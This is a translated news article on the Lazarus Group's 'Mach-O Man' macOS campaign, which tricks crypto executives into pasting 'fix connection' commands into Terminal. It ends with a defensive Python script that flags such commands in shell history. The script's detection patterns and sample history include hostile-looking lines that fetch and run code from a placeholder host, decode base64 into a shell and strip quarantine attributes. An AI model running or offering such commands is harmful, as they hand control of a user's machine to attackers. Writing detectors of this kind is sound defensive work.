Apple Mac users beware! North Korean hackers Lazarus launch new malware "Mach-O Man": One action to take over your computer
Source: 動區 BlockTempo · Published 2026-04-22 11:55:16 · Hot


Original title: 蘋果 Mac 用戶小心!北韓駭客 Lazarus 祭出全新惡意軟體「Mach-O Man」:一個動作接管你的電腦
Mac users, sound the security alarm! The North Korean hacker organization Lazarus Group has released a brand-new piece of malware targeting Apple systems called "Mach-O Man." The attackers pose as business partners and send fake video-conferencing links, tricking executives into pasting a "fix connection" command into Terminal, which hands over control of the system and lets the attackers drain assets. According to a warning from CertiK, Lazarus has stolen over $500 million in the past two weeks alone, and the entire crypto industry should treat the group as a major state-sponsored threat.

(Previous coverage: North Korean hackers get counter-hacked! ZachXBT exposes internal payment server data: fake engineers earning millions of USD per month, password was 123456) (Background: How to spot a North Korean hacker in one second? Interviewer asks them to "curse Kim Jong Un," fake Japanese engineer panics and blows their cover)

The most notorious state-sponsored North Korean hacker organization in the crypto world, Lazarus Group, is launching fierce attacks against Web3 corporate executives with a brand-new weapon tailored for Apple users. According to the latest warning from blockchain security firm CertiK, Lazarus Group is running a new attack campaign dubbed "Mach-O Man." The campaign turns routine business communication into a direct pipeline for stealing confidential credentials and causing massive financial losses. Since 2017, the estimated cumulative funds stolen by Lazarus Group have reached as high as $6.7 billion.

Their recent attack frequency is staggering. CertiK senior blockchain security researcher Natalie Newson pointed out that in the past two weeks alone, these North Korean hackers siphoned off over $500 million in assets through attacks targeting the DeFi protocols Drift and KelpDAO. "What makes Lazarus particularly dangerous right now is their 'level of activity.' KelpDAO, Drift, and now this brand-new macOS malware suite—all of this has happened within the same month. This is not random hacking; it is a state-sponsored financial operation with institutional-level scale and speed."

She further explained that "Mach-O Man" is a modular macOS malware suite created by the notorious Chollima unit under Lazarus. It uses native Mach-O binaries specifically tailored for the Apple system environment widely used in the cryptocurrency and fintech sectors. The tool is difficult to defend against because it is delivered through the social-engineering technique known as "ClickFix." Threat intelligence firm BCA Ltd founder Mauro Eldritch and CertiK experts detailed the attack flow:

- Sending urgent invitations: The attackers send "urgent" business meeting invitations (via Zoom, Microsoft Teams, or Google Meet) to corporate executives through messaging apps such as Telegram.
- Fake websites and fake errors: After clicking the link, victims land on a realistic-looking fake website that displays a prompt claiming a need to "fix a connection issue."
- Tricking victims into copying commands: The website instructs victims to copy a seemingly simple command and paste it into the Mac's Terminal to execute.
- Total compromise: Once the victim enters and runs the command themselves, the attackers immediately gain access to corporate systems, SaaS platforms, and financial resources.

Additionally, security researcher Vladimir S. pointed out that there are other variants of this attack. For example, the attackers hijack DeFi project domains and replace the site with a forged Cloudflare verification page, which likewise requires victims to enter Terminal commands to "grant access." Newson warned: "The page looks real, the instructions look normal, and the action is initiated by the victim 'themselves'—this is why traditional security controls often miss it."

Even more alarming, Mach-O Man is extremely stealthy. Most victims do not realize their security perimeter has been breached until their funds have been completely drained. By then, the malware has usually "self-deleted" to cover its tracks, leaving victims unable even to determine which variant they were infected with. BlockTempo strongly urges all crypto practitioners never to execute unknown scripts in the Terminal.
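The defining trait of the ClickFix delivery described above is that the victim types the command into Terminal themselves, so it lands in the shell history even when the payload later self-deletes. The following is an added example written for this page, not code from BlockTempo, CertiK or the researchers quoted; it scans zsh/bash history lines for the generic command shapes that paste-and-run lures rely on (a remote fetch piped into a shell, a base64 blob decoded into a shell, eval of fetched text, quarantine-attribute removal) and for attempts to clear history afterwards. The page gives no actual "Mach-O Man" command, so the patterns are assumptions about ClickFix-style commands in general, and the history lines and the domain in them are constructed sample data.

```python
"""Triage a macOS shell history for ClickFix-style paste-and-run commands.

Added example for this article; the rules below are generic assumptions
about how paste-and-run lures look, not indicators taken from the campaign.
"""
import re
import sys
from dataclasses import dataclass
from pathlib import Path

# (rule name, regex). Each rule describes a command shape a defender would
# want to review, not a specific payload.
PATTERNS = [
    # curl/wget output piped straight into a shell interpreter
    ("remote-fetch-piped-to-shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    # a base64 blob decoded and piped into a shell
    ("encoded-payload-decoded-to-shell",
     re.compile(r"\bbase64\s+(-d|--decode)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    # eval/source of text fetched by command substitution
    ("inline-eval-of-fetched-text",
     re.compile(r"\b(eval|source)\s*[\"'(]?\s*\$\((curl|wget)\b")),
    # stripping Gatekeeper's quarantine attribute from a download
    ("quarantine-bypass",
     re.compile(r"\bxattr\b.*com\.apple\.quarantine|\bxattr\s+-c\b")),
    # clearing or disabling history after the fact
    ("history-tampering",
     re.compile(r"\bhistory\s+-c\b|\bunset\s+HISTFILE\b|\brm\b[^;&|]*(zsh|bash)_history")),
]

# zsh EXTENDED_HISTORY prefixes each line with ": <epoch>:<duration>;"
_ZSH_PREFIX = re.compile(r"^:\s*\d+:\d+;")


@dataclass
class Finding:
    line_no: int
    rule: str
    command: str


def strip_timestamp(raw: str) -> str:
    """Return the bare command from a zsh extended-history or bash history line."""
    return _ZSH_PREFIX.sub("", raw.rstrip("\n"))


def scan_history(lines):
    """Return one Finding per (line, rule) match, in file order."""
    findings = []
    for n, raw in enumerate(lines, 1):
        cmd = strip_timestamp(raw)
        for name, rx in PATTERNS:
            if rx.search(cmd):
                findings.append(Finding(n, name, cmd))
    return findings


def scan_history_file(path):
    """Scan a history file on disk (e.g. ~/.zsh_history); errors='replace' tolerates zsh's metafied bytes."""
    return scan_history(Path(path).read_text(errors="replace").splitlines())


# Constructed sample history; the domain is a placeholder, not a real indicator.
SAMPLE_HISTORY = [
    ": 1776000000:0;git status",
    ": 1776000010:0;brew upgrade",
    ": 1776000020:0;curl -fsSL https://meeting-fix.example/fix.sh | bash",
    ": 1776000030:0;echo aGVsbG8K | base64 -d | sh",
    ": 1776000040:0;xattr -d com.apple.quarantine ~/Downloads/zoom-fix",
    ": 1776000050:0;eval \"$(curl -s https://meeting-fix.example/verify)\"",
    ": 1776000060:0;ls -la",
]

if __name__ == "__main__":
    # With a path argument scan that file, otherwise run over the constructed sample.
    results = scan_history_file(sys.argv[1]) if len(sys.argv) > 1 else scan_history(SAMPLE_HISTORY)
    for f in results:
        print(f"line {f.line_no}: [{f.rule}] {f.command}")
```

Run it against `~/.zsh_history` on a machine whose user recalls pasting a "fix" command; a hit on `remote-fetch-piped-to-shell` or `quarantine-bypass` is a reason to treat the host as compromised and pull the unified log around that timestamp, which is where the trail continues after a self-deleting binary is gone. The rules deliberately match shapes rather than domains, because the lure infrastructure changes far faster than the paste-and-run pattern.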